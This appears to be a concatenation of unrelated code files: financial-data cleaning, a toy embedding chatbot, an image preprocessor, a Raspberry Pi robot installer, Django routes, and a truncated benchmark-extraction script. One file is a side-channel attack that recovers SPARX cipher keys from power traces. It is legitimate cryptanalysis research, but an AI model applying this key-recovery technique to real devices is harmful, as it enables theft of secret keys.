[]\r\nfor i in company[1:]:\r\n if i not in company1:\r\n company1.append(i)\r\nendtime = booksheet.col_values(4) \r\n\r\nendtime2 = ['2018-03-31','2017-12-31','2017-09-30','2017-06-30','2017-03-31','2016-12-31','2016-09-30','2016-06-30','2016-03-31','2015-12-31','2015-09-30','2015-06-30','2015-03-31','2014-12-31','2014-09-30','2014-06-30','2014-03-31','2013-12-31','2013-09-30','2013-06-30','2013-03-31']\r\ndf_revenue = pd.DataFrame(np.arange(126).reshape((6,21)),index=company1, columns=endtime2)\r\nall_row = []\r\nfor r in range(len(company)):\r\n all_row.append(booksheet.row_values(r))\r\nfor i in range(len(all_row)):\r\n for j in endtime2:\r\n for k in company1:\r\n if all_row[i][1] == k and all_row[i][4] == j:\r\n df_revenue[j][k] = all_row[i][9]\r\nfor a in endtime2:\r\n for b in company1:\r\n df_revenue[a][b]=float(df_revenue[a][b])\r\nfor a in endtime2:\r\n for b in company1:\r\n if df_revenue[a][b] < 1000:\r\n df_revenue[a][b] = max(df_revenue.ix[b])\r\n\r\nlb1 = []\r\nlb2 = []\r\nlb3 = []\r\nfor i in company1:\r\n lb1 = [i]\r\n lb2 = lb1*21\r\n for j in lb2:\r\n lb3.append(j)\r\nendtime3 = endtime2*6\r\ncol_1 = ['股票代码','营业收入','单季营业收入','投资收益','保险业务收入','货币现金','资产总计','交易性金融资产','保险费现金流','经营现金流','投资收益现金流']\r\ndf_timeline = pd.DataFrame(np.arange(1386).reshape((126,11)),index=endtime3, columns=col_1)\r\ndf_timeline['股票代码'] = lb3\r\nlb4 = []\r\nlb6 = []\r\nfor a in company1:\r\n lb6.append(df_revenue.ix[a])\r\n for b in df_revenue.ix[a]:\r\n lb4.append(b)\r\ndf_timeline['营业收入'] = lb4\r\n\r\nlb7 = lb6\r\nfor a in range(len(lb6)):\r\n lb7[a][0]=lb6[a][0]\r\n lb7[a][1]=lb6[a][1] - lb6[a][2]\r\n lb7[a][2]=lb6[a][2] - lb6[a][3]\r\n lb7[a][3]=lb6[a][3] - lb6[a][4]\r\n lb7[a][4]=lb6[a][4]\r\n lb7[a][5]=lb6[a][5] - lb6[a][6]\r\n lb7[a][6]=lb6[a][6] - lb6[a][7]\r\n lb7[a][7]=lb6[a][7] - lb6[a][8]\r\n lb7[a][8]=lb6[a][8]\r\n lb7[a][9]=lb6[a][9] - lb6[a][10]\r\n lb7[a][10]=lb6[a][10] - lb6[a][11]\r\n lb7[a][11]=lb6[a][11] - lb6[a][12]\r\n lb7[a][12]=lb6[a][12]\r\n lb7[a][13]=lb6[a][13] - lb6[a][14]\r\n lb7[a][14]=lb6[a][14] - lb6[a][15]\r\n lb7[a][15]=lb6[a][15] - lb6[a][16]\r\n lb7[a][16]=lb6[a][16]\r\n lb7[a][17]=lb6[a][17] - lb6[a][18]\r\n lb7[a][18]=lb6[a][18] - lb6[a][19]\r\n lb7[a][19]=lb6[a][19] - lb6[a][20]\r\n lb7[a][20]=lb6[a][20]\r\nlb8 = []\r\nfor a in range(len(lb7)):\r\n for b in lb7[a]:\r\n lb8.append(b)\r\ndf_timeline['单季营业收入'] = lb8\r\n\r\ncogs = [0.0]*126\r\nguanlifei = [0.0]*126\r\nfor i in range(len(all_row)):\r\n for j in range(len(endtime3)):\r\n if all_row[i][1] == lb3[j] and all_row[i][4] == endtime3[j]:\r\n cogs[j]=all_row[i][16]\r\n guanlifei[j]=all_row[i][11]\r\nfor a in range(len(cogs)):\r\n if cogs[a]== 0 or cogs[a]== '':\r\n cogs[a] = cogs[a-4]\r\nfor b in range(len(guanlifei)):\r\n if guanlifei[b]== 0 or guanlifei[b]== '':\r\n guanlifei[b] = guanlifei[b-4]\r\n\r\ncogs1 = cogs\r\nfor n in range(31):\r\n cogs1[4*n-3] = float(cogs[4*n-3])-float(cogs[4*n-2])\r\n cogs1[4*n-2] = float(cogs[4*n-2])-float(cogs[4*n-1])\r\n cogs1[4*n-1] = float(cogs[4*n-1])-float(cogs[4*n])\r\nguanlifei1 = guanlifei\r\nfor n in range(31):\r\n guanlifei1[4*n-3] = float(guanlifei[4*n-3])-float(guanlifei[4*n-2])\r\n guanlifei1[4*n-2] = float(guanlifei[4*n-2])-float(guanlifei[4*n-1])\r\n guanlifei1[4*n-1] = float(guanlifei[4*n-1])-float(guanlifei[4*n])\r\n \r\ndf_timeline['投资收益'] = cogs1\r\ndf_timeline['保险业务收入'] = guanlifei1\r\n\r\n########\r\n\r\nworkbook_2 = xlrd.open_workbook('Balance Sheet.xls')\r\nbooksheet_2 = workbook_2.sheet_by_index(1)\r\ncompany_2 = booksheet_2.col_values(1)\r\nall_row_2 
= []\r\nfor r in range(len(company_2)):\r\n all_row_2.append(booksheet_2.row_values(r))\r\n\r\ntrad_fa = [0.0]*126\r\ncash_e = [0.0]*126\r\nclient_d = [0.0]*126\r\nfor i in range(len(all_row_2)):\r\n for j in range(len(endtime3)):\r\n if all_row_2[i][1] == lb3[j] and all_row_2[i][4] == endtime3[j]:\r\n trad_fa[j]=all_row_2[i][11]\r\n cash_e[j]=all_row_2[i][9]\r\n client_d[j]=all_row_2[i][36]\r\nfor a in range(len(trad_fa)):\r\n if trad_fa[a]== 0 or trad_fa[a]=='':\r\n trad_fa[a] = trad_fa[a-4]\r\nfor b in range(len(cash_e)):\r\n if cash_e[b]== 0 or cash_e[b]== '':\r\n cash_e[b] = cash_e[b-4]\r\nfor c in range(len(client_d)):\r\n if client_d[c]== 0 or client_d[c]== '':\r\n client_d[c] = client_d[c-4]\r\n\r\ntrad_fa1 = trad_fa\r\nfor n in range(31):\r\n trad_fa1[4*n-3] = float(trad_fa[4*n-3])-float(trad_fa[4*n-2])\r\n trad_fa1[4*n-2] = float(trad_fa[4*n-2])-float(trad_fa[4*n-1])\r\n trad_fa1[4*n-1] = float(trad_fa[4*n-1])-float(trad_fa[4*n])\r\ncash_e1 = cash_e\r\nfor n in range(31):\r\n cash_e1[4*n-3] = float(cash_e[4*n-3])-float(cash_e[4*n-2])\r\n cash_e1[4*n-2] = float(cash_e[4*n-2])-float(cash_e[4*n-1])\r\n cash_e1[4*n-1] = float(cash_e[4*n-1])-float(cash_e[4*n])\r\nclient_d1 = client_d\r\nfor n in range(31):\r\n client_d1[4*n-3] = float(client_d[4*n-3])-float(client_d[4*n-2])\r\n client_d1[4*n-2] = float(client_d[4*n-2])-float(client_d[4*n-1])\r\n client_d1[4*n-1] = float(client_d[4*n-1])-float(client_d[4*n])\r\n \r\ndf_timeline['货币现金'] = cash_e\r\ndf_timeline['资产总计'] = client_d\r\ndf_timeline['交易性金融资产'] = trad_fa\r\n\r\n#########\r\n\r\nworkbook_3 = xlrd.open_workbook('Cash Flow Statement.xls')\r\nbooksheet_3 = workbook_3.sheet_by_index(1)\r\ncompany_3 = booksheet_3.col_values(1)\r\nall_row_3 = []\r\nfor r in range(len(company_3)):\r\n all_row_3.append(booksheet_3.row_values(r))\r\n\r\ninvest = [0.0]*126\r\nyongjin = [0.0]*126\r\ncfo = [0.0]*126\r\nfor i in range(len(all_row_3)):\r\n for j in range(len(endtime3)):\r\n if all_row_3[i][1] == lb3[j] and all_row_3[i][4] == endtime3[j]:\r\n invest[j]=all_row_3[i][34]\r\n yongjin[j]=all_row_3[i][11]\r\n cfo[j]=all_row_3[i][19]\r\nfor a in range(len(invest)):\r\n if invest[a]== 0 or invest[a]=='':\r\n invest[a] = invest[a-4]\r\nfor b in range(len(yongjin)):\r\n if yongjin[b]== 0 or yongjin[b]== '':\r\n yongjin[b] = yongjin[b-4]\r\nfor c in range(len(cfo)):\r\n if cfo[c]== 0 or cfo[c]== '':\r\n cfo[c] = cfo[c-4]\r\n\r\ninvest1 = invest\r\nfor n in range(31):\r\n invest1[4*n-3] = float(invest[4*n-3])-float(invest[4*n-2])\r\n invest1[4*n-2] = float(invest[4*n-2])-float(invest[4*n-1])\r\n invest1[4*n-1] = float(invest[4*n-1])-float(invest[4*n])\r\nyongjin1 = yongjin\r\nfor n in range(31):\r\n yongjin1[4*n-3] = float(yongjin[4*n-3])-float(yongjin[4*n-2])\r\n yongjin1[4*n-2] = float(yongjin[4*n-2])-float(yongjin[4*n-1])\r\n yongjin1[4*n-1] = float(yongjin[4*n-1])-float(yongjin[4*n])\r\ncfo1 = cfo\r\nfor n in range(31):\r\n cfo1[4*n-3] = float(cfo[4*n-3])-float(cfo[4*n-2])\r\n cfo1[4*n-2] = float(cfo[4*n-2])-float(cfo[4*n-1])\r\n cfo1[4*n-1] = float(cfo[4*n-1])-float(cfo[4*n])\r\n \r\ndf_timeline['保险费现金流'] = yongjin\r\ndf_timeline['经营现金流'] = cfo\r\ndf_timeline['投资收益现金流'] = invest\r\n\r\ndf_timeline.to_csv(\"保险行业清洗数据.csv\",index=False,sep=',',encoding = 'utf-8')\r\ndf_timeline.to_excel(\"保险行业清洗数据.xlsx\",index=False)\r\n\r\nendtime5 = 
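# Editor's note: the lb7/cogs1/trad_fa1 blocks above convert cumulative
# year-to-date figures (Q1, H1, 9M, FY) into single-quarter values by
# subtracting the previous cumulative report. A pandas sketch of the same
# idea on one toy year, in chronological order:
import pandas as pd

ytd = pd.Series([10.0, 25.0, 45.0, 70.0],
                index=["Q1", "Q2", "Q3", "Q4"])   # cumulative within the year
quarterly = ytd.diff().fillna(ytd)                # Q1 kept, later quarters differenced
assert list(quarterly) == [10.0, 15.0, 20.0, 25.0]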
['2018-03','2017-12','2017-09','2017-06','2017-03','2016-12','2016-09','2016-06','2016-03','2015-12','2015-09','2015-06','2015-03','2014-12','2014-09','2014-06','2014-03','2013-12','2013-09','2013-06','2013-03']\r\nendtime6=endtime5*6\r\ndf_rev = pd.DataFrame(np.arange(252).reshape((126,2)),index=None, columns=['time','revenue'])\r\ndf_rev['time']=endtime6\r\ndf_rev['revenue']=lb8\r\nlist_b = []\r\nlist_c=[]\r\nfor x in range(6):\r\n df_rev1 = df_rev[21*x-21:21*x].sort(columns = ['time'],axis = 0,ascending = True)\r\n list_c=[df_rev1,company1[x]]\r\n list_b.append(list_c)","sub_path":"insurance.py","file_name":"insurance.py","file_ext":"py","file_size_in_byte":8100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"245925460","text":"#Ripped off from https://tfhub.dev/google/universal-sentence-encoder-large/3\nimport tensorflow as tf\nimport tensorflow_hub as hub\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport re\nimport seaborn as sns\nfrom time import time\nfrom keras.callbacks import TensorBoard\nfrom keras.layers import Input, LSTM, Embedding, Dense, Lambda, Dropout\nfrom keras.models import Model\nfrom keras import Sequential\n\nmodule_url = \"https://tfhub.dev/google/universal-sentence-encoder-large/3\" #@param [\"https://tfhub.dev/google/universal-sentence-encoder/2\", \"https://tfhub.dev/google/universal-sentence-encoder-large/3\"]\n\n# Import the Universal Sentence Encoder's TF Hub module\nembed = hub.Module(module_url)\n\n# Reduce logging output.\ntf.logging.set_verbosity(tf.logging.ERROR)\n\ndata = [\n #Smartphones\n [\"How is your phone?\", \"I like my phone\"],\n [\"My phone is not good.\", \"That why you need to buy Pixel 3!\"],\n [\"Your cellphone looks great.\", \"That is exactly what she said.\"],\n\n # Weather\n ['Would it be sunny tomorrow?', 'Yeah, it will be pretty hot tomorrow.'],\n ['Will it snow tomorrow?', 'Seems like it, there will be heavy snow storm.'],\n\n # Food and health\n [\"An apple a day, keeps the doctors away\", \"If an apple a day keeps the doctor away, how many orchards does it take for a lawyer?\"],\n [\"Eating strawberries is healthy\", \"Yeah, but that should not be all that you eat.\"],\n [\"Is paleo better than keto?\", \"Balanced diet is better.\"],\n\n # Asking about age\n [\"How old are you?\", \"I am 20 years old.\"],\n [\"what is your age?\", \"My age do not matter. 
It just a number.\"],\n [\"When is your birthday?\", \"Why does that matters you?\"]\n]\n\nx = []\ny = []\nfor pair in data:\n x.append(pair[0])\n y.append(pair[1])\n\n x.append(pair[1])\n y.append(pair[0])\n\nwith tf.Session() as session:\n session.run([tf.global_variables_initializer(), tf.tables_initializer()])\n x_embeddings = session.run(embed(x))\n y_embeddings = session.run(embed(y))\n\n print(\"x_embeddings\", x_embeddings.shape)\n\n#Training\nEMBEDDING_SIZE = 512\nprint(EMBEDDING_SIZE)\n\nmodel = Sequential([\n Dense(EMBEDDING_SIZE, activation='relu', input_shape=[EMBEDDING_SIZE]),\n Dropout(0.2),\n Dense(EMBEDDING_SIZE+round(EMBEDDING_SIZE/2), activation='relu'),\n Dropout(0.2),\n Dense(EMBEDDING_SIZE)\n ])\nmodel.compile(loss='mean_squared_error', optimizer='adam')\nmodel.summary()\n\ntensorboard = TensorBoard(log_dir=\"logs/{}\".format(time()))\nwith tf.Session() as session:\n session.run([tf.global_variables_initializer(), tf.tables_initializer()])\n history = model.fit(x_embeddings, y_embeddings, epochs=1000, verbose=1, callbacks=[tensorboard])\n model.save_weights('./model.h5')\n\n#Prediction\np = [\n \"Will there be a thunderstorm tomorrow?\",\n \"Are you eating vegetables and fruits?\",\n \"Do you think it's worth buy thats phone?\",\n \"Should we eat protein after workout?\"\n ]\np_y = []\nwith tf.Session() as session:\n session.run([tf.global_variables_initializer(), tf.tables_initializer()])\n model.load_weights('./model.h5')\n p_embeddings = embed(p) \n predicts = model.predict(p_embeddings, steps=1)\n\nprint(predicts)\n\nfrom annoy import AnnoyIndex\n\nmaps = {}\nfor i in range(len(y)):\n maps[y[i]] = i\nprint(maps)\n\nt = AnnoyIndex(EMBEDDING_SIZE)\nfor i in range(len(y)):\n t.add_item(i, y_embeddings[i])\nt.build(10) # 10 trees\nt.save('test.ann')\n\nu = AnnoyIndex(EMBEDDING_SIZE)\nu.load('test.ann')\nfor i in range(len(p)):\n r = u.get_nns_by_vector(predicts[i], 1)\n print(\"Question:\", p[i], \"\\nPredicted:\", list(maps.keys())[list(maps.values()).index(r[0])], \"\\n\")","sub_path":"large-3-regression.py","file_name":"large-3-regression.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"253426490","text":"#!/usr/bin/python3\n\n# An implementation of Ordinal-HD attack.\n\nimport traces\nfrom utils import *\n\nimport sys\nimport numpy\nimport scipy\nfrom collections import Counter\nimport multiprocessing\nfrom tqdm import tqdm\n\nfrom blist import blist\n\n# Global configuration.\nBYTEORDER = 'little' # Byte order for ARM-Cortex-M0.\n(alpha, beta) = (0x0011, 0x2233) # The correct key.\nN = 16 # Number of bits of operator.\nK = 4 # Chunk size.\n\n# Experiment configurations.\nNTRIAL = 200 # Number of repetitions of experiments.\nNTRACEUSE = 2000 # Number of traces to use in each trial.\n\n\ndef ModAdd(x, y, a, b, mask):\n return ((x ^ a) + (y ^ b)) & mask\n\ndef GetKey(pos, offset):\n ac = (0x2200 >> pos) % (1 << offset)\n bc = (0x2233 >> pos) % (1 << offset)\n return (ac, bc)\n\ndef TestKey(ds_sorted, pos, offset):\n (ac, bc) = GetKey(pos, offset)\n kl = [k for k in ds_sorted[0:8] if (ac, bc) == (k[0], k[1])]\n if len(kl) != 0:\n return True\n else:\n return False\n\n# Perform KSA on a chunk.\n# ts : Trace set.\n# pos : Starting position of this chunk.\n# offset : Chunk offset, i.e. 
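# Editor's note: a minimal annoy build-and-query round trip matching the
# retrieval step above. Recent annoy releases require the metric name in the
# constructor; the script above relies on the older default signature.
import numpy as np
from annoy import AnnoyIndex

dim = 8
index = AnnoyIndex(dim, "angular")
vectors = np.random.rand(5, dim)
for i, v in enumerate(vectors):
    index.add_item(i, v.tolist())
index.build(10)                          # 10 trees, as in the script above

assert index.get_nns_by_vector(vectors[2].tolist(), 1) == [2]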
size of chunk in bits.\ndef KSA(ts, pos, offset, a, b, tp = 0):\n cmask = (1 << offset) - 1 # Chunk mask\n gleakage = ts.GetPoint(tp) # Global data set\n DS = list() # Key candidates and distinguishing scores.\n \n # Enumerate over all possible keys.\n for ac in range(1 << offset):\n for bc in range(1 << offset):\n ksa_classes = [blist() for i in range(1 << offset)] # KSA classes.\n ag = a | (ac << pos)\n bg = b | (bc << pos)\n \n # Classify the traces by the target values.\n for trc in ts.GetTraces():\n # Extract (x,y) from the plaintext.\n pt = trc.udata[0:7]\n x = rotr(int.from_bytes(pt[0:2], byteorder=BYTEORDER), 7, N)\n y = int.from_bytes(pt[2:4], byteorder=BYTEORDER)\n # Compute the ARX sum in target ch\n s = ModAdd(x, y, ag, bg, (1 << 16) - 1)\n s = (s >> pos) & cmask\n # Add the leakage to corresponding class.\n ksa_classes[s].append(trc.points[tp])\n\n # Compute and sum the KS distances.\n kssum = 0\n for i in range( 1 << offset):\n ksd = scipy.stats.ks_2samp(gleakage, ksa_classes[i])[0]\n kssum += ksd\n \n DS.append((ac, bc, kssum))\n\n # Return distinguishing scores for all key guesses.\n return DS\n\n\n# Full key recovery for SPARX.\n# ts : Trace set.\ndef FullKeyRecovery(ts):\n (a, b) = (0, 0)\n\n # Iterate over each chunk.\n for i in range(0, N - 1, K - 1):\n # Perform KSA on the next trunk.\n DS = SortDim(KSA(ts, i, K, a, b), 2, True)\n if TestKey(DS, i, K):\n (ac, bc) = GetKey(i, K - 1)\n a |= ac << i\n b |= bc << i\n else:\n return (-1, -1)\n \n \n return (a, b)\n\n\n# Wrapper function for parallelisation.\n# arg : Pool.map() API argument.\ndef ParallelThreadWrapper(arg):\n (rdata) = arg\n # Recover the least significant sub keys.\n keymod = (1 << ((N - 1) - (N - 1) % (K - 1))) - 1\n if FullKeyRecovery(rdata) == (rotr(alpha, 7, N) & keymod, beta & keymod):\n return True\n else:\n return False\n\n\n# Main function.\ndef main(argc, argv):\n global alpha, beta, starttp, endtp\n\n print('#Full key KSA on SPARX.')\n fulldata = traces.LoadTraceSet(open(argv[1], 'rb'))\n\n print('#Read {} traces'.format(len(fulldata.GetTraces())))\n print('#Correct keys (rotated):({:04X},{:04X})'.format(\n rotr(alpha, 7, N), beta))\n print(\"#Using {}/{} traces\".format(NTRACEUSE, len(fulldata.GetTraces())))\n\n # Repeat the test.\n ncorrect = 0\n print(\"#NTRIAL = {}\".format(NTRIAL))\n\n if True:\n pool = multiprocessing.Pool()\n results = [None for i in range(NTRIAL)]\n\n print('#Generating random trace sets...')\n for i in tqdm(range(NTRIAL)):\n paraArgs = (fulldata.RandomSubset(NTRACEUSE))\n results[i] = pool.apply_async(ParallelThreadWrapper, (paraArgs,))\n\n print('#Performing key recovery attack...')\n for i in tqdm(range(NTRIAL)):\n if results[i].get():\n ncorrect += 1\n\n else:\n # Serial\n for i in tqdm(range(NTRIAL)):\n if ParallelThreadWrapper((fulldata.RandomSubset(NTRACEUSE))):\n ncorrect += 1\n\n # Remove the progress bar.\n sys.stdout.write(\"\\r\\033[K\\033[F\\n\")\n sys.stdout.flush()\n print('#Success rate:')\n print(\"{:0.4f}\".format(float(ncorrect) / float(NTRIAL)))\n\n return\n\n\nif __name__ == '__main__':\n main(len(sys.argv), sys.argv)\n","sub_path":"scripts/fullkeyKsa_sparx.py","file_name":"fullkeyKsa_sparx.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"638731602","text":"##\r\n## /src/data/preprocessors/default_preprocessor.py\r\n##\r\n## Created by Paul Warkentin on 15/07/2018.\r\n## Updated by Paul Warkentin on 25/07/2018.\r\n##\r\n\r\nimport os\r\nimport 
sys\r\nimport tensorflow as tf\r\n\r\n__exec_dir = sys.path[0]\r\nwhile os.path.basename(__exec_dir) != \"src\":\r\n\t__exec_dir = os.path.dirname(__exec_dir)\r\n\tsys.path.insert(0, __exec_dir)\r\n\r\n\r\nclass DefaultPreprocessor(object):\r\n\t\"\"\"Handle the pre-processing step that decodes raw image data from the features.\r\n\r\n\tThe magic function `__call__(self, *args, **kwargs)` must be implemented in order to function as a valid pre-processing class.\r\n\t\"\"\"\r\n\r\n\tdef __init__(self):\r\n\t\t\"\"\"Initializes the class.\r\n\t\t\"\"\"\r\n\t\tsuper().__init__()\r\n\r\n\r\n\tdef __call__(self, inputs):\r\n\t\t\"\"\"Handle the pre-processing step defined in this class.\r\n\r\n\t\tThe following input features are required:\r\n\t\t\t'image/format',\r\n\t\t\t'image/encoded',\r\n\t\t\t'image/{height,width,channels}',\r\n\t\t\t'image/object/bbox/{y_min,x_min,y_max,x_max}'.\r\n\t\tThe following output features are computed within this step:\r\n\t\t\t'image',\r\n\t\t\t'image/shape',\r\n\t\t\t'image/object/bbox'.\r\n\r\n\t\tArguments:\r\n\t\t\tinputs: Dictionary containing all available input features.\r\n\r\n\t\tReturns:\r\n\t\t\tDictionary containing all input features and the new computed output features.\r\n\t\t\"\"\"\r\n\t\toutput = {}\r\n\r\n\t\t# decode image\r\n\t\timage = tf.cond(\r\n\t\t\ttf.equal(inputs[\"image/format\"], tf.constant(\"jpeg\", dtype=tf.string)),\r\n\t\t\ttrue_fn = lambda image=inputs[\"image/encoded\"]: tf.image.decode_jpeg(image, channels=3, dct_method=\"INTEGER_ACCURATE\"),\r\n\t\t\tfalse_fn = lambda image=inputs[\"image/encoded\"]: tf.image.decode_image(image, channels=3)\r\n\t\t)\r\n\t\timage.set_shape((None, None, 3))\r\n\r\n\t\t# build image shape\r\n\t\timage_shape = tf.stack([inputs[\"image/height\"], inputs[\"image/width\"], inputs[\"image/channels\"]])\r\n\r\n\t\t# build bounding boxes\r\n\t\timage_object_bbox = tf.stack([\r\n\t\t\tinputs[\"image/object/bbox/y_min\"],\r\n\t\t\tinputs[\"image/object/bbox/x_min\"],\r\n\t\t\tinputs[\"image/object/bbox/y_max\"],\r\n\t\t\tinputs[\"image/object/bbox/x_max\"]\r\n\t\t], axis=1)\r\n\r\n\t\t# change image dtype to float\r\n\t\tif image.dtype != tf.float32:\r\n\t\t\timage = tf.cast(image, tf.float32)\r\n\r\n\t\toutput[\"image\"] = image\r\n\t\toutput[\"image/shape\"] = image_shape\r\n\t\toutput[\"image/object/bbox\"] = image_object_bbox\r\n\r\n\t\treturn output\r\n","sub_path":"src/data/preprocessors/default_preprocessor.py","file_name":"default_preprocessor.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"648740490","text":"#!/usr/bin/python3\n# File name : setup.py\n# Description : RaspTank Setup Script (REVAMPED)\n# Website : www.adeept.com\n# E-mail : support@adeept.com\n# Author : Shaun Longworth\n# Date : 2019/05/30\n \nimport os\nimport time\nimport sys\n \nautostart_dir = \"/home/pi/.config/autostart\"\nautostart_file = autostart_dir + \"/car.desktop\"\ninstall_dir = \"/home/pi/Adeept_RaspTank/server\"\n \n# Commonly used functions\ndef replace_num(file,initial,new_num): \n newline=\"\"\n str_num=str(new_num)\n with open(file,\"r\") as f:\n for line in f.readlines():\n if(line.find(initial) == 0):\n line = (str_num+'\\n')\n newline += line\n with open(file,\"w\") as f:\n f.writelines(newline)\n \ndef run_os_command(cmd, max_runs=4):\n try:\n sys.stdout.write('###################################################\\n')\n sys.stdout.write('Command: ' + cmd + '\\n')\n for x in range(0,max_runs):\n if 
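run_os_command retries a shell command until it exits with status 0 or max_runs attempts are exhausted; a hedged sketch of the same retry pattern with subprocess.run, which avoids os.system's return-code quirks (the helper name is mine, not part of the original script):

import subprocess

def run_with_retries(cmd, max_runs=4):
    # retry until the command reports success (exit code 0)
    for _ in range(max_runs):
        if subprocess.run(cmd, shell=True).returncode == 0:
            return True
    return False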
os.system(cmd) == 0:\n break\n except:\n print('AN ERROR OCCURRED RUNNING THE FOLLOWING COMMAND: ' + cmd)\n pass\n \ndef create_autostart():\n try:\n if (not os.path.exists(autostart_dir)):\n run_os_command(\"sudo mkdir '\" + autostart_dir + \"/'\", 1)\n if (not os.path.isfile(autostart_file)):\n run_os_command(\"sudo touch \" + autostart_file, 1)\n \n with open(autostart_file,'w') as file_to_write:\n file_to_write.write(\"[Desktop Entry]\\n Name=Car\\n Comment=Car\\n Exec=sudo python3 \" + install_dir + \"/server.py\\n Icon=false\\n Terminal=false\\n MutipleArgs=false\\n Type=Application\\n Catagories=Application;Development;\\n StartupNotify=true\")\n except:\n print('Autostart failed. Please try again')\n pass\n \ndef upgrade_system():\n # Upgrade the existing system\n run_os_command(\"sudo apt-get update\")\n run_os_command(\"sudo apt-get purge -y wolfram-engine\")\n run_os_command(\"sudo apt-get purge -y libreoffice*\")\n run_os_command(\"sudo apt-get -y clean\")\n run_os_command(\"sudo apt-get -y autoremove\")\n run_os_command(\"sudo apt-get -y upgrade\")\n \ndef install_car():\n # Enable the interface(s)\n try:\n replace_num(\"/boot/config.txt\",'#dtparam=i2c_arm=on','dtparam=i2c_arm=on\\nstart_x=1\\n')\n except:\n pass\n \n # Prepare to install. Clean & Update the repositories\n run_os_command(\"sudo apt-get clean\")\n run_os_command(\"sudo apt-get update\")\n \n # Install the new software\n run_os_command(\"sudo apt-get install -y i2c-tools\")\n run_os_command(\"sudo pip3 install adafruit-pca9685\")\n run_os_command(\"sudo pip3 install rpi_ws281x\")\n run_os_command(\"sudo pip3 install -U pip\")\n run_os_command(\"sudo pip3 install numpy\")\n run_os_command(\"sudo pip3 install opencv-contrib-python\")\n run_os_command(\"sudo apt-get install -y libhdf5-dev\")\n run_os_command(\"sudo apt-get install -y libhdf5-serial-dev\")\n run_os_command(\"sudo apt-get install -y build-essential pkg-config\")\n run_os_command(\"sudo apt-get install -y libjpeg-dev libtiff5-dev libjasper-dev libpng12-dev\")\n run_os_command(\"sudo apt-get install -y libavcodec-dev libavformat-dev libswscale-dev libv4l-dev\")\n run_os_command(\"sudo apt-get install -y libgtk2.0-dev libatlas-base-dev gfortran\")\n run_os_command(\"sudo apt-get install -y libqtgui4 python3-pyqt5 libqt4-test\")\n run_os_command(\"sudo pip3 install imutils zmq pybase64 psutil\")\n \n # Create the Access Point\n run_os_command(\"git clone https://github.com/oblique/create_ap.git\")\n run_os_command(\"cd //home/pi/create_ap && sudo make install\", 1)\n \n # Download, build & Install Sphinxbase & PocketSphinx\n run_os_command(\"sudo apt-get install -y util-linux procps hostapd iproute2 iw haveged dnsmasq\")\n \n # Set up the autostart, move the config file accordingly\n create_autostart()\n run_os_command(\"sudo cp -f \" + install_dir + \"/config.txt /home/pi/config.txt\", 1)\n \ndef reboot_system():\n # Reboot the server to have the changes take effect\n run_os_command(\"sudo reboot\")\n \nwhile True:\n try:\n selection = int(input(\"Select an option:\\n 1 = Upgrade OS;\\n 2 = Install Car;\\n 3 = Reboot;\\n 4 = Exit\\n\\nOption to select: \"))\n \n if selection == 1:\n upgrade_system()\n sys.stdout.write('###################################################\\n')\n sys.stdout.write('IT IS RECOMMENDED YOU REBOOT BEFORE CONTINUING.....\\n')\n sys.stdout.write('###################################################\\n')\n elif selection == 2:\n install_car()\n elif selection == 3:\n reboot_system()\n elif selection == 4:\n break\n else:\n 
print(\"Invalid selection. Please try again\") \n except:\n print(\"Invalid selection. Please try again\")\n pass\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"121526188","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 30 01:31:28 2019\n\n\"\"\"\n\nimport main_val as main\n\nimport main_m\n\n\n\"\"\"\n전 모델 공통 파라미터\n\"\"\"\n#input timestep\n\nmain.epochs = 100\nmain.batch_size = 128\nmain.isMulti = False\nmain.is_One_Station = False\nmain.One_Station = 31\nmain.isSaved = False\n#main.isweightSave = True\n\n\n\n\n# batch는 val과 train모두에게 나누어 떨어져야 함\nmain.val_dataset_raw = int(365*24)# + main.input_timestep +main.output_timestep\nmain.train_dataset_raw = int(365*24*3)# + main.input_timestep +main.output_timestep\nmain.test_dataset_raw = int(365*24)# + main.input_timestep +main.output_timestep\n#\ninput_timestep = [1,4,12,24]\nmain.input_timestep = 24\nfor main.output_timestep in input_timestep:\n main_m.run()","sub_path":"Source Code/Training Model/root_test_routine.py","file_name":"root_test_routine.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"64299974","text":"from django.urls import path \nfrom . import views\n\nurlpatterns = [\n path('',views.home2, name ='home'),\n path('oxygen',views.oxygen, name ='oxygen'),\n path('consult',views.consult1, name ='consult'),\n path('consult2',views.consult2, name ='consult2'),\n path('booking11',views.booking, name ='booking'),\n path('profile',views.profile, name='profile'),\n path('edit_pro',views.edit_pro, name='edit_pro'),\n path('edit_style',views.edit_style, name='edit_style'),\n path('record',views.record1, name='record'),\n path('adminshow',views.adminshow, name='adminshowrecord')\n\n \n\n]\n","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"525606190","text":"#!/usr/bin/env python3\n\nfrom argparse import ArgumentParser\nimport xml.etree.ElementTree as ET\nimport csv\nimport sys\nimport os\nimport re\nimport json\n\ng_submissions = None\n\nfrom extract_data_from_solvers_divisions import g_logics_all as g_logics_all\nfrom extract_data_from_solvers_divisions import (\n TRACK_SINGLE_QUERY_RAW,\n TRACK_INCREMENTAL_RAW,\n TRACK_UNSAT_CORE_RAW,\n TRACK_MODEL_VALIDATION_RAW,\n TRACK_PROOF_EXHIBITION_RAW,\n TRACK_PARALLEL_RAW,\n 